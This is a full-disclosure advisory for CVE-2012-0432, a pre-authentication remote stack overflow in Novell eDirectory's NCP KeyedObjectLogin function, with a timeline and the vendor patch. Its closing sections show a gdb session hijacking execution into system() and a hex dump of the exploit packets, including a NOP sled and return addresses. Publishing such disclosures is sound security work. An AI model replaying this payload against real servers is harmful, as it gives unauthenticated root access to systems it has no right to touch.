=====================================================================
Title: Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow.
Author: David Klein (david.r.klein at 676D61696).
Product: Novell NCP in eDirectory.
Platform: Linux RCE, Windows (GS), Sol & AIX likely vuln.
CVES: CVE-2012-0432
=====================================================================
1. Summary:
Stack Buffer Overflow in vulnerable (network) function.
The vulnerable function is KeyedObjectLogin (http://bit.ly/W5IeHO).
Bug is trivially exploitable on Linux due to lack of stack cookie,
the vulnerable process runs as root by default, giving an attacker
full control over the process in the context of uid0.
Vulnerability is remotely exploitable, authentication not required.
2. Description (wiki):
http://en.wikipedia.org/wiki/Novell_eDirectory
3. Solution:
Install vendor patch. 'eDirectory 8.8 SP7 patch 2 6989'
Download: http://download.novell.com/Download?buildid=ifVmcyYyHI8
4. Timeline:
08102012 - discovery
12102012 - PGP key link on vendors site 404's.
12102012 - requested secure contact from vendor.
06102012 - emailed SuSE sec asking if they have a contact.
18102012 - contacted NetIQ Tech Services.
26102012 - bug logged internally with Novell (785272)
06112012 - vendor contact, bug will be fixed in 88SP7 patch 2.
13122012 - patch released, only available to paying customers.
15012013 - public full disclosure.
5. Thank you:
Kevin Pidd of NetIQ (Novell?) for prompt responses,
andrewG for assistance especially with gdb & Linux.
emp for industry contacts
6. Demo (system(), exit(), source and pcaps available on request)
(gdb) break system
Breakpoint 1 at 0x1607d4
(gdb) continue
Continuing.
[New Thread 0x44deb70 (LWP 8944)]
[Switching to Thread 0x25eab70 (LWP 8897)]
Breakpoint 1, 0x001607d4 in system () from /lib/libpthread.so.0
(gdb) x/4x $esp
0x1e8bba8: 0x90909090 0x90909090 0x08052d9c 0x00000000
(gdb) x/4x $ebp
0x1e8bbac: 0x90909090 0x08052d9c 0x00000000 0x90909090
(gdb) x/1i $eip
=> 0x1607d4 <system+4>: call 0x1565e0 <__i686.get_pc_thunk.bx>
(gdb) i r
eax 0xf0 240
ecx 0x8364034 137773108
edx 0x0 0
ebx 0x90909090 -1869574000
esp 0x1e8bba8 0x1e8bba8
ebp 0x1e8bbac 0x1e8bbac
esi 0x14e4bef4 350535412
edi 0xf 15
eip 0x1607d4 0x1607d4 <system+4>
...
(gdb) continue
Continuing.
Detaching after fork from child process.
...
[Thread 0x25eab70 (LWP 8897) exited]
Program exited with code 0220.
7. Payload on the wire:
->
00000000 44 6d 64 54 00 00 00 17 00 00 00 01 00 00 00 00
00000010 11 11 00 00 00 00 00
<-
00000000 74 4e 63 50 00 00 00 10 33 33 00 10 00 00 00 00
->
00000017 44 6d 64 54 00 00 01 0c 00 00 00 01 00 00 00 05
00000027 22 22 01 10 00 00 17 00 a7 18 90 90 90 90 90 90
00000037 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000047 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000057 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000067 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8c 26
00000077 05 08 9c 2d 05 08 00 00 00 00 90 90 90 90 00 01
00000087 9b 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
00000097 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
000000A7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
000000B7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
000000C7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
000000D7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
000000E7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
000000F7 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
00000107 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
00000117 48 48 48 48 48 48 48 48 48 48 48 48
